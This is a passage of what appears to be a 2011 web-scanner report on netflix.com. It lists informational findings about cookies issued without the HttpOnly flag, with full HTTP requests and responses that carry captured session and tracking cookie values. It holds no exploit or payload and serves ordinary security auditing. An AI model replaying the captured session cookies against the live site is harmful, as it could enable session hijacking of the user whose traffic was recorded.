serverBeforeHtml: 1313440012406 };</script> <meta h...[SNIP]...
5.4. http://www.netflix.com/AllNewReleases
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.netflix.com
Path:
/AllNewReleases
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:lastHitTime=1313440061108; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440027486~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:41 GMT; Path=/ nflxsid=112.1313440061108; Domain=.netflix.com; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /AllNewReleases?lnkctr=NavAllNewReleases HTTP/1.1 Host: www.netflix.com Proxy-Connection: keep-alive Referer: http://blog.netflix.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NetflixSession=112.1e2e3251-3515-4814-b345-95fe1d50c31f; NSC_ED1-xxx=ffffffff09c8016145525d5f4f58455e445a4a422d69; asearch=131343986063011112; NetflixCookies=persistent; ecssn=eyJjb20ubmV0ZmxpeC5lYy51aWNvbW1vbi5jb250ZXh0LlZpc2l0b3JTZXNzaW9uIjpbeyJtYXAiOlt7ImVudHJ5IjpbeyJzdHJpbmciOlsidiIsIjAwMSJdfSx7InN0cmluZyI6WyJkbnNwYyIsdHJ1ZV19XX1dfV19; __qca=P0-1419279816-1313440086339; custProps=; miscCache=0001BaxV73woW1lgtt176vbOITHXrP8=!!&masqueradeSession=-1&giftTrackingCode=67041862&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&callerAuthId=888+000&callerAuthUpdateDate=0&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMjc0ODY6OnRjdz0xJmNxcz06"; vstCnt=1~1~1313414827493; p_id=2828PJJP6PRPRLNJ6262A8N2H8LR8J2H4A; p_first_ref=; p_first_entry=https%3A//www.netflix.com/; p_last_ref=; s_id=AP28PJJP6PRPRAN6A862A8N2H8LR8J2H4A; s_entry=https%3A//www.netflix.com/; lastHitTime=1313440043253; VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440027486~; nflxsid=112.1313440043253
Response
HTTP/1.1 302 Moved Temporarily Date: Mon, 15 Aug 2011 20:27:40 GMT Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA" Location: http://www.netflix.com/entryTrap.jsp?why=hyperactiveSet-Cookie: lastHitTime=1313440061108; Domain=.netflix.com; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440027486~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:41 GMT; Path=/ Set-Cookie: nflxsid=112.1313440061108; Domain=.netflix.com; Path=/ Vary: Accept-Encoding Cache-Control: private Content-Length: 0 Content-Type: text/plain
5.5. http://www.netflix.com/AppGallery
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.netflix.com
Path:
/AppGallery
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:lastHitTime=1313440263028; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440027486~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:31:03 GMT; Path=/ nflxsid=112.1313440263028; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440263035~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:31:03 GMT; Path=/ nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAyNjMwMzU6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:31:03 GMT; Path=/ vstCnt=1~1~1313415063038; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:31:03 GMT; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /AppGallery HTTP/1.1 Host: www.netflix.com Proxy-Connection: keep-alive Referer: http://developer.netflix.com/member/register User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NetflixSession=112.1e2e3251-3515-4814-b345-95fe1d50c31f; NSC_ED1-xxx=ffffffff09c8016145525d5f4f58455e445a4a422d69; asearch=131343986063011112; NetflixCookies=persistent; ecssn=eyJjb20ubmV0ZmxpeC5lYy51aWNvbW1vbi5jb250ZXh0LlZpc2l0b3JTZXNzaW9uIjpbeyJtYXAiOlt7ImVudHJ5IjpbeyJzdHJpbmciOlsidiIsIjAwMSJdfSx7InN0cmluZyI6WyJkbnNwYyIsdHJ1ZV19XX1dfV19; __qca=P0-1419279816-1313440086339; custProps=; miscCache=0001BaxV73woW1lgtt176vbOITHXrP8=!!&masqueradeSession=-1&giftTrackingCode=67041862&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&callerAuthId=888+000&callerAuthUpdateDate=0&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMjc0ODY6OnRjdz0xJmNxcz06"; vstCnt=1~1~1313414827493; p_id=2828PJJP6PRPRLNJ6262A8N2H8LR8J2H4A; p_first_ref=; p_first_entry=https%3A//www.netflix.com/; p_last_ref=; s_id=AP28PJJP6PRPRAN6A862A8N2H8LR8J2H4A; s_entry=https%3A//www.netflix.com/; lastHitTime=1313440084868; VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440027486~; nflxsid=112.1313440084869
Response
HTTP/1.1 302 Moved Temporarily Date: Mon, 15 Aug 2011 20:31:02 GMT Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA" Cache-Control: private Pragma: no-cache Expires: Sun, 14 Aug 2011 20:31:03 GMT Location: http://www.netflix.com/Default Content-Type: text/html;charset=UTF-8Set-Cookie: lastHitTime=1313440263028; Domain=.netflix.com; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440027486~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:31:03 GMT; Path=/ Set-Cookie: nflxsid=112.1313440263028; Domain=.netflix.com; Path=/ Set-Cookie: custProps=; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:31:03 GMT; Path=/Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440263035~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:31:03 GMT; Path=/ Set-Cookie: nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAyNjMwMzU6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:31:03 GMT; Path=/ Set-Cookie: vstCnt=1~1~1313415063038; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:31:03 GMT; Path=/ Vary: Accept-Encoding Content-Length: 0
5.6. http://www.netflix.com/BrowseSelection
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.netflix.com
Path:
/BrowseSelection
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:lastHitTime=1313439943947; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313439943805~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:25:43 GMT; Path=/ nflxsid=112.1313439943947; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313439943951~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:25:43 GMT; Path=/ nmp="MDAxOjUxNDAxOTE1OjEzMTM0Mzk5NDM5NTI6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:25:43 GMT; Path=/ vstCnt=1~1~1313414743954; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:25:43 GMT; Path=/ miscCache=0001IeyYfbanSwHbPg6eSxURzz9dxA4=!!&masqueradeSession=-1&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=BROWSE_SELECTION&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; Domain=.netflix.com; Path=/ miscCache=0001IeyYfbanSwHbPg6eSxURzz9dxA4=!!&masqueradeSession=-1&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=BROWSE_SELECTION&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; Domain=.netflix.com; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /BrowseSelection HTTP/1.1 Host: www.netflix.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NetflixSession=112.1e2e3251-3515-4814-b345-95fe1d50c31f; NSC_ED1-xxx=ffffffff09c8016145525d5f4f58455e445a4a422d69; asearch=131343986063011112; NetflixCookies=persistent; lastHitTime=1313439930896; nflxsid=112.1313439930896; custProps=; VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313439930900~; nmp="MDAxOjUxNDAxOTE1OjEzMTM0Mzk5MzA5MDA6OnRjdz0xJmNxcz06"; vstCnt=1~1~1313414730902; miscCache=0001oqclemLBuncTYzjfnhkxDP3armc=!!&masqueradeSession=-1&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; p_id=2828PJJP6PRPRLNJ6262A8N2H8LR8J2H4A; p_first_ref=; p_first_entry=https%3A//www.netflix.com/; p_last_ref=; s_id=AP28PJJP6PRPRAN6A862A8N2H8LR8J2H4A; s_entry=https%3A//www.netflix.com/
Response
HTTP/1.1 200 OK Date: Mon, 15 Aug 2011 20:25:43 GMT Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA" Cache-Control: private Pragma: no-cache Expires: Sun, 14 Aug 2011 20:25:43 GMT Content-Type: text/html;charset=UTF-8Set-Cookie: lastHitTime=1313439943947; Domain=.netflix.com; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313439943805~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:25:43 GMT; Path=/ Set-Cookie: nflxsid=112.1313439943947; Domain=.netflix.com; Path=/ Set-Cookie: custProps=; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:25:43 GMT; Path=/Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313439943951~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:25:43 GMT; Path=/ Set-Cookie: nmp="MDAxOjUxNDAxOTE1OjEzMTM0Mzk5NDM5NTI6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:25:43 GMT; Path=/ Set-Cookie: vstCnt=1~1~1313414743954; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:25:43 GMT; Path=/ Set-Cookie: miscCache=0001IeyYfbanSwHbPg6eSxURzz9dxA4=!!&masqueradeSession=-1&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=BROWSE_SELECTION&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; Domain=.netflix.com; Path=/ Set-Cookie: miscCache=0001IeyYfbanSwHbPg6eSxURzz9dxA4=!!&masqueradeSession=-1&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=BROWSE_SELECTION&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; Domain=.netflix.com; Path=/ Vary: Accept-Encoding Content-Length: 68593 <!DOCTYPE HTML> <html> <head> <script type="text/javascript">var RoundTripInfo = { htmlStart: (new Date()).getTime(), serverStart: 1313439943947, serverBeforeHtml: 1313439943957 };</script> <meta h...[SNIP]...
5.7. http://www.netflix.com/ContactUs
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.netflix.com
Path:
/ContactUs
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:lastHitTime=1313440021492; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440020423~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:01 GMT; Path=/ nflxsid=112.1313440021492; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440021496~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:01 GMT; Path=/ nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMjE0OTY6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:27:01 GMT; Path=/ vstCnt=1~1~1313414821498; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:01 GMT; Path=/ miscCache=000131kQ7I/YA8wiAIC2m8z/Tu1b/8I=!!&masqueradeSession=-1&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&callerAuthId=888+000&callerAuthUpdateDate=0&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; Domain=.netflix.com; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ContactUs HTTP/1.1 Host: www.netflix.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NetflixSession=112.1e2e3251-3515-4814-b345-95fe1d50c31f; NSC_ED1-xxx=ffffffff09c8016145525d5f4f58455e445a4a422d69; asearch=131343986063011112; NetflixCookies=persistent; ecssn=eyJjb20ubmV0ZmxpeC5lYy51aWNvbW1vbi5jb250ZXh0LlZpc2l0b3JTZXNzaW9uIjpbeyJtYXAiOlt7ImVudHJ5IjpbeyJzdHJpbmciOlsidiIsIjAwMSJdfSx7InN0cmluZyI6WyJkbnNwYyIsdHJ1ZV19XX1dfV19; miscCache=0001oqclemLBuncTYzjfnhkxDP3armc=!!&masqueradeSession=-1&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; lastHitTime=1313440012234; nflxsid=112.1313440012235; custProps=; VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440012239~; nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMTIyMzk6OnRjdz0xJmNxcz06"; vstCnt=1~1~1313414812241; p_id=2828PJJP6PRPRLNJ6262A8N2H8LR8J2H4A; p_first_ref=; p_first_entry=https%3A//www.netflix.com/; p_last_ref=; s_id=AP28PJJP6PRPRAN6A862A8N2H8LR8J2H4A; s_entry=https%3A//www.netflix.com/
Response
HTTP/1.1 200 OK Date: Mon, 15 Aug 2011 20:27:01 GMT Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA" Cache-Control: private Pragma: no-cache Expires: Sun, 14 Aug 2011 20:27:01 GMT Content-Type: text/html;charset=UTF-8Set-Cookie: lastHitTime=1313440021492; Domain=.netflix.com; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440020423~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:01 GMT; Path=/ Set-Cookie: nflxsid=112.1313440021492; Domain=.netflix.com; Path=/ Set-Cookie: custProps=; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:27:01 GMT; Path=/Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440021496~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:01 GMT; Path=/ Set-Cookie: nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMjE0OTY6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:27:01 GMT; Path=/ Set-Cookie: vstCnt=1~1~1313414821498; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:01 GMT; Path=/ Set-Cookie: miscCache=000131kQ7I/YA8wiAIC2m8z/Tu1b/8I=!!&masqueradeSession=-1&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&callerAuthId=888+000&callerAuthUpdateDate=0&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; Domain=.netflix.com; Path=/ Vary: Accept-Encoding Content-Length: 13271 <!DOCTYPE HTML> <html> <head> <script type="text/javascript">var RoundTripInfo = { htmlStart: (new Date()).getTime(), serverStart: 1313440021492, serverBeforeHtml: 1313440021499 };</script> <meta h...[SNIP]...
5.8. http://www.netflix.com/Default
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.netflix.com
Path:
/Default
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:lastHitTime=1313440085894; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440027486~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:28:05 GMT; Path=/ nflxsid=112.1313440085894; Domain=.netflix.com; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Default?lnkctr=entryTrap HTTP/1.1 Host: www.netflix.com Proxy-Connection: keep-alive Referer: http://www.netflix.com/entryTrap.jsp?why=hyperactive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NetflixSession=112.1e2e3251-3515-4814-b345-95fe1d50c31f; NSC_ED1-xxx=ffffffff09c8016145525d5f4f58455e445a4a422d69; asearch=131343986063011112; NetflixCookies=persistent; ecssn=eyJjb20ubmV0ZmxpeC5lYy51aWNvbW1vbi5jb250ZXh0LlZpc2l0b3JTZXNzaW9uIjpbeyJtYXAiOlt7ImVudHJ5IjpbeyJzdHJpbmciOlsidiIsIjAwMSJdfSx7InN0cmluZyI6WyJkbnNwYyIsdHJ1ZV19XX1dfV19; __qca=P0-1419279816-1313440086339; custProps=; miscCache=0001BaxV73woW1lgtt176vbOITHXrP8=!!&masqueradeSession=-1&giftTrackingCode=67041862&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&callerAuthId=888+000&callerAuthUpdateDate=0&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMjc0ODY6OnRjdz0xJmNxcz06"; vstCnt=1~1~1313414827493; p_id=2828PJJP6PRPRLNJ6262A8N2H8LR8J2H4A; p_first_ref=; p_first_entry=https%3A//www.netflix.com/; p_last_ref=; s_id=AP28PJJP6PRPRAN6A862A8N2H8LR8J2H4A; s_entry=https%3A//www.netflix.com/; lastHitTime=1313440065067; VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440027486~; nflxsid=112.1313440065067
Response
HTTP/1.1 302 Moved Temporarily Date: Mon, 15 Aug 2011 20:28:05 GMT Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA" Location: http://www.netflix.com/entryTrap.jsp?why=hyperactiveSet-Cookie: lastHitTime=1313440085894; Domain=.netflix.com; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440027486~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:28:05 GMT; Path=/ Set-Cookie: nflxsid=112.1313440085894; Domain=.netflix.com; Path=/ Vary: Accept-Encoding Cache-Control: private Content-Length: 0 Content-Type: text/plain
5.9. http://www.netflix.com/Gift
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.netflix.com
Path:
/Gift
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:lastHitTime=1313440028555; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440027486~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:08 GMT; Path=/ nflxsid=112.1313440028556; Domain=.netflix.com; Path=/ miscCache=0001BaxV73woW1lgtt176vbOITHXrP8=!!&masqueradeSession=-1&giftTrackingCode=67041862&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&callerAuthId=888+000&callerAuthUpdateDate=0&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440028571~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:08 GMT; Path=/ nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMjg1NzE6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:27:08 GMT; Path=/ vstCnt=1~1~1313414828578; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:08 GMT; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Gift?gctrkid=67041862 HTTP/1.1 Host: www.netflix.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NetflixSession=112.1e2e3251-3515-4814-b345-95fe1d50c31f; NSC_ED1-xxx=ffffffff09c8016145525d5f4f58455e445a4a422d69; asearch=131343986063011112; NetflixCookies=persistent; ecssn=eyJjb20ubmV0ZmxpeC5lYy51aWNvbW1vbi5jb250ZXh0LlZpc2l0b3JTZXNzaW9uIjpbeyJtYXAiOlt7ImVudHJ5IjpbeyJzdHJpbmciOlsidiIsIjAwMSJdfSx7InN0cmluZyI6WyJkbnNwYyIsdHJ1ZV19XX1dfV19; miscCache=000131kQ7I/YA8wiAIC2m8z/Tu1b/8I=!!&masqueradeSession=-1&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&callerAuthId=888+000&callerAuthUpdateDate=0&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; __qca=P0-1419279816-1313440086339; vstCnt=1~1~1313414824069; p_id=2828PJJP6PRPRLNJ6262A8N2H8LR8J2H4A; p_first_ref=; p_first_entry=https%3A//www.netflix.com/; p_last_ref=; s_id=AP28PJJP6PRPRAN6A862A8N2H8LR8J2H4A; s_entry=https%3A//www.netflix.com/; lastHitTime=1313440025702; nflxsid=112.1313440025702; custProps=; VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440025706~; nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMjU3MDY6OnRjdz0xJmNxcz06"
Response
HTTP/1.1 200 OK Date: Mon, 15 Aug 2011 20:27:08 GMT Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA" Cache-Control: private Pragma: no-cache Expires: Sun, 14 Aug 2011 20:27:08 GMT Content-Type: text/html;charset=UTF-8Set-Cookie: lastHitTime=1313440028555; Domain=.netflix.com; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440027486~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:08 GMT; Path=/ Set-Cookie: nflxsid=112.1313440028556; Domain=.netflix.com; Path=/ Set-Cookie: custProps=; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:27:08 GMT; Path=/Set-Cookie: miscCache=0001BaxV73woW1lgtt176vbOITHXrP8=!!&masqueradeSession=-1&giftTrackingCode=67041862&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&callerAuthId=888+000&callerAuthUpdateDate=0&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; Domain=.netflix.com; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440028571~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:08 GMT; Path=/ Set-Cookie: nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMjg1NzE6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:27:08 GMT; Path=/ Set-Cookie: vstCnt=1~1~1313414828578; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:08 GMT; Path=/ Vary: Accept-Encoding Content-Length: 17994 <!DOCTYPE HTML> <html> <head> <script type="text/javascript">var RoundTripInfo = { htmlStart: (new Date()).getTime(), serverStart: 1313440028555, serverBeforeHtml: 1313440028580 };</script> <meta h...[SNIP]...
5.10. http://www.netflix.com/MediaCenter
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.netflix.com
Path:
/MediaCenter
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:lastHitTime=1313439891610; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313439890548~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:24:51 GMT; Path=/ nflxsid=112.1313439891610; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313439891614~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:24:51 GMT; Path=/ nmp="MDAxOjUxNDAxOTE1OjEzMTM0Mzk4OTE2MTQ6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:24:51 GMT; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /MediaCenter HTTP/1.1 Host: www.netflix.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NetflixSession=112.1e2e3251-3515-4814-b345-95fe1d50c31f; NSC_ED1-xxx=ffffffff09c8016145525d5f4f58455e445a4a422d69; asearch=131343986063011112; NetflixCookies=persistent; p_id=2828PJJP6PRPRLNJ6262A8N2H8LR8J2H4A; p_first_ref=; p_first_entry=https%3A//www.netflix.com/; p_last_ref=; s_id=AP28PJJP6PRPRAN6A862A8N2H8LR8J2H4A; s_entry=https%3A//www.netflix.com/; lastHitTime=1313439869400; nflxsid=112.1313439869400; custProps=; VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313439869403~; nmp="MDAxOjUxNDAxOTE1OjEzMTM0Mzk4Njk0MDM6OnRjdz0xJmNxcz06"; 